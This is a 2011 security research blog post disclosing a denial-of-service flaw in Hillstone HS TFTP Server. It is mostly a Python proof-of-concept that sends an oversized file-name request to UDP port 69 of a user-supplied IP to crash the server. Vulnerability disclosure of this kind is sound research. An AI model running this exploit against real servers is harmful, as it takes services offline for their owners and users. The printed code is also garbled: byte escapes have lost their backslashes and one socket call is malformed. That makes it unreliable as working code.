Learn Search

Search across all Learn content

← Back to Security Research

Hillstone Software HS TFTP Server Denial Of Service Vulnerability

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service but can be st...

Dec 1, 2011By Veerendra GG2 min read

SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service but can be stopped using a vulnerability management tool.

Also, a patch management solution can patch this flaw.

POC : Download here.

More information on the flaws can be found here.

plaintext
#!/usr/bin/python
##############################################################################
# Title     : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author    : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor    : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory  : https://www.secpod.com/blog/?p=419
#             http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
#             http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version   : Hillstone Software HS TFTP 1.3.2
# Date      : 02/12/2011
##############################################################################

import socket,sys,time

port   = 69
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

## File name >= 222 length leads to crash
exploit = "x90" * 2222

mode = "binary"
print "File name WRITE/READ crash"

## WRITE command = x00x02
data = "x00x02" + exploit + "" + mode + ""

## READ command = x00x01
## data = "x00x01" + exploit + "" + mode + ""

sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
    sock.connect()
except:
    print "Remote TFTP server port is down..."
    sys.exit(1)

Welcome any feedback or suggestion.

Cheers!
SecPod Research Team

Hillstone Software HS TFTP Server Denial Of Service Vulnerability | SecPod